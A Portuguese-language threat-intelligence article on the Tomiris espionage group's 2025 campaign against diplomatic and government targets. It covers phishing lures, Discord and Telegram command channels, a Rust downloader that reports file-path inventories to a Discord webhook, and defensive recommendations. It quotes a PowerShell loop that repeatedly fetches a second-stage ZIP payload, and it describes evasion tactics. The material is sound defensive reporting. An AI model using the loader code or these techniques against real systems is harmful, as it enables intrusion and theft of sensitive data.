Panorama e escopo
Analistas da Securelist relatam que, desde o início de 2025, o ator Tomiris mudou a operação para priorizar alvos de alto valor no âmbito diplomático e governamental. A campanha descrita mistura cargas customizadas e componentes open-source, com ênfase em furtividade e persistência dentro de redes comprometidas.
Vetor de entrada e táticas iniciais
As infecções costumam começar com spear-phishing que transporta arquivos compactados protegidos por senha. Os operadores frequentemente usam extensões duplas e ícones que imitam documentos Office para enganar vítimas e contornar scanners automatizados. As matérias citam um padrão de senha observado em amostras — por exemplo, "min@2025" — que tem eficácia em burlar detecções automatizadas.
Ferramentas, linguagens e C2
O grupo tem adotado múltiplas linguagens (Go, Rust, C/C++, Python) para seus artefatos, aumentando a dificuldade de detecção por assinaturas tradicionais. Tomiris também passou a utilizar serviços públicos como Telegram e Discord para C2, integrando tráfego malicioso a canais legítimos e dificultando a diferenciação do tráfego em ambientes corporativos.
Rust Downloader e fluxo de exfiltração
Um componente destacado é o Rust Downloader, ainda não documentado anteriormente. Esse implant realiza uma varredura por tipos de arquivo sensíveis (.pdf, .docx, .xlsx) em discos específicos, mas em vez de exfiltrar imediatamente os conteúdos, compila uma lista de caminhos e envia esse inventário para um webhook do Discord via multipart POST.
O payload usa um campo "payload_json" para informações do sistema e um campo "file" para a lista de caminhos, garantindo uma estrutura de dados no envio. O downloader evita diretórios típicos do sistema como "Program Files", "Windows" e "AppData" para reduzir detecções por scanners que focam em atividade nessas pastas.
Estágio de persistência e carga secundária
Após enviar a lista de caminhos, o downloader cria um arquivo Visual Basic (script.vbs) que executa um PowerShell (script.ps1). O PowerShell implementa um loop que tenta buscar uma carga secundária — tipicamente um ZIP com executáveis — repetidamente a cada minuto até o sucesso. A lógica de tentativa/espera publicada em fontes tem a seguinte forma:
while($true){
try{
$Response = Invoke-WebRequest -Uri $Url -UseBasicParsing
iwr -OutFile $env:Temp\1.zip -Uri $dUrl
New-Item -Path $env:TEMP\rfolder -ItemType Directory
break
}catch{
Start-Sleep -Seconds 60
}
}Uso de frameworks open-source
Além de componentes proprietários, Tomiris tem integrado frameworks open-source de pós-exploração como Havoc e AdaptixC2, tornando a cadeia de ataque mais modular e resiliente. Essa escolha mistura utilitários amplamente disponíveis com artefatos customizados, o que complica tanto a atribuição quanto a mitigação.
Impacto e setores visados
As informações das fontes indicam foco em ministérios e entidades governamentais externas — atores que usualmente detêm dados sensíveis de diplomacia e relações internacionais. O uso de canais públicos de C2 e a coleta estruturada de caminhos de arquivos sugerem que o objetivo inicial é reconhecimento e seleção de alvos para exfiltração subsequente.
Limites das informações
As matérias compilam análise técnica e artefatos observados em amostras; não há, nas fontes consultadas, uma lista pública de vítimas nomeadas nem métricas quantificadas de compromissos bem-sucedidos divulgadas. As descrições técnicas vêm de análises da Securelist republicadas pela fonte primária.
O que defender agora
As práticas descritas nas fontes sugerem foco em detecção de spear-phishing com anexos compactados, análise de tráfego para padrões incomuns em serviços públicos (Telegram/Discord), verificação de criação de scripts VBS/PowerShell que implementam loops de download e inspeção de requisições multipart apontando para webhooks. A combinação de componentes custom e ferramentas open-source exige controles que não dependam apenas de assinaturas estáticas.